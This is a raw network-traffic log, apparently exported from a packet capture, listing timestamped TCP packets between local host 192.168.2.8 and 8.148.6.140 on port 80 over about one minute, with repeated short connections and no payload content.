        Jan 10, 2025 09:28:38.084042072 CET4979180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:38.088998079 CET80497918.148.6.140192.168.2.8
        Jan 10, 2025 09:28:38.197191000 CET4979280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:38.202244997 CET80497928.148.6.140192.168.2.8
        Jan 10, 2025 09:28:38.202311993 CET4979280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:38.202440023 CET4979280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:38.207274914 CET80497928.148.6.140192.168.2.8
        Jan 10, 2025 09:28:39.188714981 CET80497928.148.6.140192.168.2.8
        Jan 10, 2025 09:28:39.188783884 CET80497928.148.6.140192.168.2.8
        Jan 10, 2025 09:28:39.188911915 CET4979280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:39.190100908 CET4979280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:39.194890022 CET80497928.148.6.140192.168.2.8
        Jan 10, 2025 09:28:39.306158066 CET4979380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:39.311103106 CET80497938.148.6.140192.168.2.8
        Jan 10, 2025 09:28:39.313170910 CET4979380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:39.317768097 CET4979380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:39.322505951 CET80497938.148.6.140192.168.2.8
        Jan 10, 2025 09:28:40.258126974 CET80497938.148.6.140192.168.2.8
        Jan 10, 2025 09:28:40.258187056 CET4979380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:40.258228064 CET80497938.148.6.140192.168.2.8
        Jan 10, 2025 09:28:40.258268118 CET4979380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:40.258311987 CET4979380192.168.2.88.148.6.140
        Jan 10, 2025 09:28:40.263042927 CET80497938.148.6.140192.168.2.8
        Jan 10, 2025 09:28:40.370994091 CET4979480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:40.375900030 CET80497948.148.6.140192.168.2.8
        Jan 10, 2025 09:28:40.379117012 CET4979480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:40.382991076 CET4979480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:40.387859106 CET80497948.148.6.140192.168.2.8
        Jan 10, 2025 09:28:44.379884958 CET80497948.148.6.140192.168.2.8
        Jan 10, 2025 09:28:44.379998922 CET80497948.148.6.140192.168.2.8
        Jan 10, 2025 09:28:44.380070925 CET4979480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:44.383024931 CET4979480192.168.2.88.148.6.140
        Jan 10, 2025 09:28:44.387865067 CET80497948.148.6.140192.168.2.8
        Jan 10, 2025 09:28:44.605537891 CET4979580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:44.612663984 CET80497958.148.6.140192.168.2.8
        Jan 10, 2025 09:28:44.612761974 CET4979580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:44.612925053 CET4979580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:44.620105028 CET80497958.148.6.140192.168.2.8
        Jan 10, 2025 09:28:45.576145887 CET80497958.148.6.140192.168.2.8
        Jan 10, 2025 09:28:45.576211929 CET4979580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:45.576221943 CET80497958.148.6.140192.168.2.8
        Jan 10, 2025 09:28:45.576301098 CET4979580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:45.576322079 CET80497958.148.6.140192.168.2.8
        Jan 10, 2025 09:28:45.576370955 CET4979580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:45.576488972 CET4979580192.168.2.88.148.6.140
        Jan 10, 2025 09:28:45.581219912 CET80497958.148.6.140192.168.2.8
        Jan 10, 2025 09:28:45.682523012 CET4979680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:45.687347889 CET80497968.148.6.140192.168.2.8
        Jan 10, 2025 09:28:45.687417984 CET4979680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:45.687546015 CET4979680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:45.692322969 CET80497968.148.6.140192.168.2.8
        Jan 10, 2025 09:28:46.673100948 CET80497968.148.6.140192.168.2.8
        Jan 10, 2025 09:28:46.673121929 CET80497968.148.6.140192.168.2.8
        Jan 10, 2025 09:28:46.677290916 CET4979680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:46.677290916 CET4979680192.168.2.88.148.6.140
        Jan 10, 2025 09:28:46.682312965 CET80497968.148.6.140192.168.2.8
        Jan 10, 2025 09:28:46.794991970 CET4979780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:46.800015926 CET80497978.148.6.140192.168.2.8
        Jan 10, 2025 09:28:46.803061008 CET4979780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:46.803208113 CET4979780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:46.808160067 CET80497978.148.6.140192.168.2.8
        Jan 10, 2025 09:28:47.753010035 CET80497978.148.6.140192.168.2.8
        Jan 10, 2025 09:28:47.753083944 CET4979780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:47.753118038 CET80497978.148.6.140192.168.2.8
        Jan 10, 2025 09:28:47.753253937 CET4979780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:47.780354023 CET4979780192.168.2.88.148.6.140
        Jan 10, 2025 09:28:47.785161972 CET80497978.148.6.140192.168.2.8
        Jan 10, 2025 09:28:47.994807959 CET4979880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:47.999682903 CET80497988.148.6.140192.168.2.8
        Jan 10, 2025 09:28:47.999747038 CET4979880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:48.000396967 CET4979880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:48.005237103 CET80497988.148.6.140192.168.2.8
        Jan 10, 2025 09:28:51.939306021 CET80497988.148.6.140192.168.2.8
        Jan 10, 2025 09:28:51.939357042 CET80497988.148.6.140192.168.2.8
        Jan 10, 2025 09:28:51.939380884 CET4979880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:51.939429998 CET4979880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:51.939539909 CET4979880192.168.2.88.148.6.140
        Jan 10, 2025 09:28:51.944320917 CET80497988.148.6.140192.168.2.8
        Jan 10, 2025 09:28:52.056777000 CET4979980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:52.061800003 CET80497998.148.6.140192.168.2.8
        Jan 10, 2025 09:28:52.061876059 CET4979980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:52.062064886 CET4979980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:52.066884995 CET80497998.148.6.140192.168.2.8
        Jan 10, 2025 09:28:53.681771040 CET80497998.148.6.140192.168.2.8
        Jan 10, 2025 09:28:53.681835890 CET4979980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:53.681925058 CET80497998.148.6.140192.168.2.8
        Jan 10, 2025 09:28:53.682018995 CET80497998.148.6.140192.168.2.8
        Jan 10, 2025 09:28:53.682060957 CET4979980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:53.682060957 CET4979980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:53.791028976 CET4979980192.168.2.88.148.6.140
        Jan 10, 2025 09:28:53.791484118 CET4980080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:53.796489000 CET80497998.148.6.140192.168.2.8
        Jan 10, 2025 09:28:53.797045946 CET80498008.148.6.140192.168.2.8
        Jan 10, 2025 09:28:53.797115088 CET4980080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:53.797283888 CET4980080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:53.803668976 CET80498008.148.6.140192.168.2.8
        Jan 10, 2025 09:28:54.773519039 CET80498008.148.6.140192.168.2.8
        Jan 10, 2025 09:28:54.773649931 CET4980080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:54.773660898 CET80498008.148.6.140192.168.2.8
        Jan 10, 2025 09:28:54.774101973 CET4980080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:54.884599924 CET4980180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:54.884599924 CET4980080192.168.2.88.148.6.140
        Jan 10, 2025 09:28:54.889432907 CET80498008.148.6.140192.168.2.8
        Jan 10, 2025 09:28:54.889456034 CET80498018.148.6.140192.168.2.8
        Jan 10, 2025 09:28:54.889682055 CET4980180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:54.890147924 CET4980180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:54.894954920 CET80498018.148.6.140192.168.2.8
        Jan 10, 2025 09:28:59.413872004 CET4980180192.168.2.88.148.6.140
        Jan 10, 2025 09:28:59.540498018 CET4980280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:59.545389891 CET80498028.148.6.140192.168.2.8
        Jan 10, 2025 09:28:59.545504093 CET4980280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:59.546215057 CET4980280192.168.2.88.148.6.140
        Jan 10, 2025 09:28:59.550957918 CET80498028.148.6.140192.168.2.8
        Jan 10, 2025 09:29:00.536429882 CET80498028.148.6.140192.168.2.8
        Jan 10, 2025 09:29:00.536494017 CET80498028.148.6.140192.168.2.8
        Jan 10, 2025 09:29:00.536504030 CET4980280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:00.536545992 CET4980280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:00.536727905 CET4980280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:00.541559935 CET80498028.148.6.140192.168.2.8
        Jan 10, 2025 09:29:00.650347948 CET4980380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:00.655217886 CET80498038.148.6.140192.168.2.8
        Jan 10, 2025 09:29:00.655456066 CET4980380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:00.655646086 CET4980380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:00.660442114 CET80498038.148.6.140192.168.2.8
        Jan 10, 2025 09:29:02.417505026 CET80498038.148.6.140192.168.2.8
        Jan 10, 2025 09:29:02.417536020 CET80498038.148.6.140192.168.2.8
        Jan 10, 2025 09:29:02.417557001 CET80498038.148.6.140192.168.2.8
        Jan 10, 2025 09:29:02.417594910 CET4980380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:02.417629004 CET4980380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:02.422213078 CET4980380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:02.427032948 CET80498038.148.6.140192.168.2.8
        Jan 10, 2025 09:29:02.542572975 CET4980480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:02.547422886 CET80498048.148.6.140192.168.2.8
        Jan 10, 2025 09:29:02.547602892 CET4980480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:02.547645092 CET4980480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:02.552460909 CET80498048.148.6.140192.168.2.8
        Jan 10, 2025 09:29:03.528382063 CET80498048.148.6.140192.168.2.8
        Jan 10, 2025 09:29:03.528558969 CET80498048.148.6.140192.168.2.8
        Jan 10, 2025 09:29:03.528752089 CET4980480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:03.528784037 CET4980480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:03.533561945 CET80498048.148.6.140192.168.2.8
        Jan 10, 2025 09:29:03.634287119 CET4980580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:03.639147997 CET80498058.148.6.140192.168.2.8
        Jan 10, 2025 09:29:03.639292002 CET4980580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:03.639604092 CET4980580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:03.644345999 CET80498058.148.6.140192.168.2.8
        Jan 10, 2025 09:29:04.608283997 CET80498058.148.6.140192.168.2.8
        Jan 10, 2025 09:29:04.608355045 CET80498058.148.6.140192.168.2.8
        Jan 10, 2025 09:29:04.608371019 CET4980580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:04.608417988 CET4980580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:04.608511925 CET4980580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:04.613358021 CET80498058.148.6.140192.168.2.8
        Jan 10, 2025 09:29:04.712095022 CET4980680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:04.717012882 CET80498068.148.6.140192.168.2.8
        Jan 10, 2025 09:29:04.717242002 CET4980680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:04.717242002 CET4980680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:04.722152948 CET80498068.148.6.140192.168.2.8
        Jan 10, 2025 09:29:05.652791023 CET80498068.148.6.140192.168.2.8
        Jan 10, 2025 09:29:05.652890921 CET80498068.148.6.140192.168.2.8
        Jan 10, 2025 09:29:05.652910948 CET4980680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:05.652998924 CET4980680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:05.653964043 CET4980680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:05.665380955 CET80498068.148.6.140192.168.2.8
        Jan 10, 2025 09:29:05.758507013 CET4980780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:05.763273954 CET80498078.148.6.140192.168.2.8
        Jan 10, 2025 09:29:05.764060974 CET4980780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:05.764166117 CET4980780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:05.768943071 CET80498078.148.6.140192.168.2.8
        Jan 10, 2025 09:29:08.144260883 CET80498078.148.6.140192.168.2.8
        Jan 10, 2025 09:29:08.144396067 CET80498078.148.6.140192.168.2.8
        Jan 10, 2025 09:29:08.144539118 CET4980780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:08.145934105 CET4980780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:08.150675058 CET80498078.148.6.140192.168.2.8
        Jan 10, 2025 09:29:08.258620977 CET4980880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:08.263487101 CET80498088.148.6.140192.168.2.8
        Jan 10, 2025 09:29:08.267071009 CET4980880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:08.267235041 CET4980880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:08.271956921 CET80498088.148.6.140192.168.2.8
        Jan 10, 2025 09:29:09.416951895 CET80498088.148.6.140192.168.2.8
        Jan 10, 2025 09:29:09.416963100 CET80498088.148.6.140192.168.2.8
        Jan 10, 2025 09:29:09.416975975 CET80498088.148.6.140192.168.2.8
        Jan 10, 2025 09:29:09.416986942 CET80498088.148.6.140192.168.2.8
        Jan 10, 2025 09:29:09.417069912 CET4980880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:09.417069912 CET4980880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:09.417213917 CET4980880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:09.425451040 CET80498088.148.6.140192.168.2.8
        Jan 10, 2025 09:29:09.524593115 CET4980980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:09.529373884 CET80498098.148.6.140192.168.2.8
        Jan 10, 2025 09:29:09.531049013 CET4980980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:09.531135082 CET4980980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:09.535898924 CET80498098.148.6.140192.168.2.8
        Jan 10, 2025 09:29:13.537892103 CET4980980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:13.649282932 CET4981080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:13.654272079 CET80498108.148.6.140192.168.2.8
        Jan 10, 2025 09:29:13.654370070 CET4981080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:13.654551029 CET4981080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:13.659374952 CET80498108.148.6.140192.168.2.8
        Jan 10, 2025 09:29:14.656960964 CET80498108.148.6.140192.168.2.8
        Jan 10, 2025 09:29:14.657013893 CET80498108.148.6.140192.168.2.8
        Jan 10, 2025 09:29:14.657022953 CET4981080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:14.657056093 CET4981080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:14.657172918 CET4981080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:14.661876917 CET80498108.148.6.140192.168.2.8
        Jan 10, 2025 09:29:14.774673939 CET4981180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:14.779577017 CET80498118.148.6.140192.168.2.8
        Jan 10, 2025 09:29:14.779640913 CET4981180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:14.779822111 CET4981180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:14.784567118 CET80498118.148.6.140192.168.2.8
        Jan 10, 2025 09:29:15.778203964 CET80498118.148.6.140192.168.2.8
        Jan 10, 2025 09:29:15.778273106 CET80498118.148.6.140192.168.2.8
        Jan 10, 2025 09:29:15.778363943 CET4981180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:15.778610945 CET4981180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:15.783359051 CET80498118.148.6.140192.168.2.8
        Jan 10, 2025 09:29:15.891083956 CET4981280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:15.895989895 CET80498128.148.6.140192.168.2.8
        Jan 10, 2025 09:29:15.896146059 CET4981280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:15.896365881 CET4981280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:15.901204109 CET80498128.148.6.140192.168.2.8
        Jan 10, 2025 09:29:16.884021997 CET80498128.148.6.140192.168.2.8
        Jan 10, 2025 09:29:16.884074926 CET4981280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:16.884212017 CET80498128.148.6.140192.168.2.8
        Jan 10, 2025 09:29:16.884252071 CET4981280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:16.884829998 CET4981280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:16.889565945 CET80498128.148.6.140192.168.2.8
        Jan 10, 2025 09:29:16.996531010 CET4981380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:17.001760006 CET80498138.148.6.140192.168.2.8
        Jan 10, 2025 09:29:17.001827955 CET4981380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:17.001980066 CET4981380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:17.006783962 CET80498138.148.6.140192.168.2.8
        Jan 10, 2025 09:29:18.007044077 CET80498138.148.6.140192.168.2.8
        Jan 10, 2025 09:29:18.007100105 CET80498138.148.6.140192.168.2.8
        Jan 10, 2025 09:29:18.007169962 CET4981380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:18.007169962 CET4981380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:18.007272005 CET4981380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:18.012026072 CET80498138.148.6.140192.168.2.8
        Jan 10, 2025 09:29:18.118966103 CET4981480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:18.123812914 CET80498148.148.6.140192.168.2.8
        Jan 10, 2025 09:29:18.125051975 CET4981480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:18.125232935 CET4981480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:18.129987001 CET80498148.148.6.140192.168.2.8
        Jan 10, 2025 09:29:19.134562969 CET80498148.148.6.140192.168.2.8
        Jan 10, 2025 09:29:19.134605885 CET80498148.148.6.140192.168.2.8
        Jan 10, 2025 09:29:19.134628057 CET4981480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:19.134658098 CET4981480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:19.134789944 CET4981480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:19.139617920 CET80498148.148.6.140192.168.2.8
        Jan 10, 2025 09:29:19.244532108 CET4981580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:19.249428034 CET80498158.148.6.140192.168.2.8
        Jan 10, 2025 09:29:19.249490976 CET4981580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:19.249758005 CET4981580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:19.254493952 CET80498158.148.6.140192.168.2.8
        Jan 10, 2025 09:29:20.260967970 CET80498158.148.6.140192.168.2.8
        Jan 10, 2025 09:29:20.261071920 CET80498158.148.6.140192.168.2.8
        Jan 10, 2025 09:29:20.262352943 CET4981580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:20.263334036 CET4981580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:20.268054962 CET80498158.148.6.140192.168.2.8
        Jan 10, 2025 09:29:20.403031111 CET4981680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:20.407856941 CET80498168.148.6.140192.168.2.8
        Jan 10, 2025 09:29:20.407929897 CET4981680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:20.409785986 CET4981680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:20.414520025 CET80498168.148.6.140192.168.2.8
        Jan 10, 2025 09:29:21.353132963 CET80498168.148.6.140192.168.2.8
        Jan 10, 2025 09:29:21.353199959 CET4981680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:21.353234053 CET80498168.148.6.140192.168.2.8
        Jan 10, 2025 09:29:21.353281975 CET4981680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:21.354074001 CET4981680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:21.358880997 CET80498168.148.6.140192.168.2.8
        Jan 10, 2025 09:29:21.462937117 CET4981780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:21.467811108 CET80498178.148.6.140192.168.2.8
        Jan 10, 2025 09:29:21.467997074 CET4981780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:21.468386889 CET4981780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:21.473195076 CET80498178.148.6.140192.168.2.8
        Jan 10, 2025 09:29:22.463193893 CET80498178.148.6.140192.168.2.8
        Jan 10, 2025 09:29:22.463246107 CET4981780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:22.463304996 CET80498178.148.6.140192.168.2.8
        Jan 10, 2025 09:29:22.463351965 CET4981780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:22.463510990 CET4981780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:22.468321085 CET80498178.148.6.140192.168.2.8
        Jan 10, 2025 09:29:22.572868109 CET4981880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:22.577686071 CET80498188.148.6.140192.168.2.8
        Jan 10, 2025 09:29:22.577758074 CET4981880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:22.577879906 CET4981880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:22.582690954 CET80498188.148.6.140192.168.2.8
        Jan 10, 2025 09:29:23.562367916 CET80498188.148.6.140192.168.2.8
        Jan 10, 2025 09:29:23.562550068 CET80498188.148.6.140192.168.2.8
        Jan 10, 2025 09:29:23.562586069 CET80498188.148.6.140192.168.2.8
        Jan 10, 2025 09:29:23.562844992 CET4981880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:23.562918901 CET4981880192.168.2.88.148.6.140
        Jan 10, 2025 09:29:23.567648888 CET80498188.148.6.140192.168.2.8
        Jan 10, 2025 09:29:23.680821896 CET4981980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:23.687469959 CET80498198.148.6.140192.168.2.8
        Jan 10, 2025 09:29:23.689054966 CET4981980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:23.690064907 CET4981980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:23.694829941 CET80498198.148.6.140192.168.2.8
        Jan 10, 2025 09:29:24.631443977 CET80498198.148.6.140192.168.2.8
        Jan 10, 2025 09:29:24.631480932 CET80498198.148.6.140192.168.2.8
        Jan 10, 2025 09:29:24.631526947 CET4981980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:24.631567001 CET4981980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:24.632074118 CET4981980192.168.2.88.148.6.140
        Jan 10, 2025 09:29:24.636801004 CET80498198.148.6.140192.168.2.8
        Jan 10, 2025 09:29:24.743928909 CET4982080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:24.748733044 CET80498208.148.6.140192.168.2.8
        Jan 10, 2025 09:29:24.748795033 CET4982080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:24.749212980 CET4982080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:24.754029036 CET80498208.148.6.140192.168.2.8
        Jan 10, 2025 09:29:25.726171017 CET80498208.148.6.140192.168.2.8
        Jan 10, 2025 09:29:25.726248980 CET80498208.148.6.140192.168.2.8
        Jan 10, 2025 09:29:25.726362944 CET4982080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:25.728235960 CET4982080192.168.2.88.148.6.140
        Jan 10, 2025 09:29:25.733028889 CET80498208.148.6.140192.168.2.8
        Jan 10, 2025 09:29:25.953387022 CET4982180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:25.958170891 CET80498218.148.6.140192.168.2.8
        Jan 10, 2025 09:29:25.958314896 CET4982180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:25.958554983 CET4982180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:25.963326931 CET80498218.148.6.140192.168.2.8
        Jan 10, 2025 09:29:26.908431053 CET80498218.148.6.140192.168.2.8
        Jan 10, 2025 09:29:26.908493042 CET4982180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:26.908550978 CET80498218.148.6.140192.168.2.8
        Jan 10, 2025 09:29:26.908597946 CET4982180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:27.025726080 CET4982180192.168.2.88.148.6.140
        Jan 10, 2025 09:29:27.026123047 CET4982280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:27.030596018 CET80498218.148.6.140192.168.2.8
        Jan 10, 2025 09:29:27.030968904 CET80498228.148.6.140192.168.2.8
        Jan 10, 2025 09:29:27.031033039 CET4982280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:27.031115055 CET4982280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:27.035871983 CET80498228.148.6.140192.168.2.8
        Jan 10, 2025 09:29:31.037956953 CET4982280192.168.2.88.148.6.140
        Jan 10, 2025 09:29:31.150284052 CET4982380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:31.155169964 CET80498238.148.6.140192.168.2.8
        Jan 10, 2025 09:29:31.155242920 CET4982380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:31.155375004 CET4982380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:31.160147905 CET80498238.148.6.140192.168.2.8
        Jan 10, 2025 09:29:32.129740953 CET80498238.148.6.140192.168.2.8
        Jan 10, 2025 09:29:32.129798889 CET80498238.148.6.140192.168.2.8
        Jan 10, 2025 09:29:32.133806944 CET4982380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:32.166349888 CET4982380192.168.2.88.148.6.140
        Jan 10, 2025 09:29:32.171287060 CET80498238.148.6.140192.168.2.8
        Jan 10, 2025 09:29:32.275594950 CET4982480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:32.280527115 CET80498248.148.6.140192.168.2.8
        Jan 10, 2025 09:29:32.280647039 CET4982480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:32.280879974 CET4982480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:32.286654949 CET80498248.148.6.140192.168.2.8
        Jan 10, 2025 09:29:33.879856110 CET80498248.148.6.140192.168.2.8
        Jan 10, 2025 09:29:33.879950047 CET80498248.148.6.140192.168.2.8
        Jan 10, 2025 09:29:33.879973888 CET4982480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:33.882994890 CET4982480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:33.992861986 CET4982480192.168.2.88.148.6.140
        Jan 10, 2025 09:29:33.995134115 CET4982580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:33.997649908 CET80498248.148.6.140192.168.2.8
        Jan 10, 2025 09:29:34.000339031 CET80498258.148.6.140192.168.2.8
        Jan 10, 2025 09:29:34.003004074 CET4982580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:34.003082991 CET4982580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:34.011291027 CET80498258.148.6.140192.168.2.8
        Jan 10, 2025 09:29:34.967295885 CET80498258.148.6.140192.168.2.8
        Jan 10, 2025 09:29:34.967349052 CET4982580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:34.967389107 CET80498258.148.6.140192.168.2.8
        Jan 10, 2025 09:29:34.967407942 CET80498258.148.6.140192.168.2.8
        Jan 10, 2025 09:29:34.967427015 CET4982580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:34.967456102 CET4982580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:34.968158007 CET4982580192.168.2.88.148.6.140
        Jan 10, 2025 09:29:34.972940922 CET80498258.148.6.140192.168.2.8
        Jan 10, 2025 09:29:35.123492002 CET4982680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:35.128458023 CET80498268.148.6.140192.168.2.8
        Jan 10, 2025 09:29:35.128525019 CET4982680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:35.142998934 CET4982680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:35.147840023 CET80498268.148.6.140192.168.2.8
        Jan 10, 2025 09:29:39.144649029 CET80498268.148.6.140192.168.2.8
        Jan 10, 2025 09:29:39.144714117 CET4982680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:39.144877911 CET80498268.148.6.140192.168.2.8
        Jan 10, 2025 09:29:39.144922972 CET4982680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:39.260435104 CET4982680192.168.2.88.148.6.140
        Jan 10, 2025 09:29:39.260900021 CET4982780192.168.2.88.148.6.140
        Jan 10, 2025 09:29:39.269013882 CET80498268.148.6.140192.168.2.8
        Jan 10, 2025 09:29:39.269030094 CET80498278.148.6.140192.168.2.8
        Jan 10, 2025 09:29:39.269109964 CET4982780192.168.2.88.148.6.140
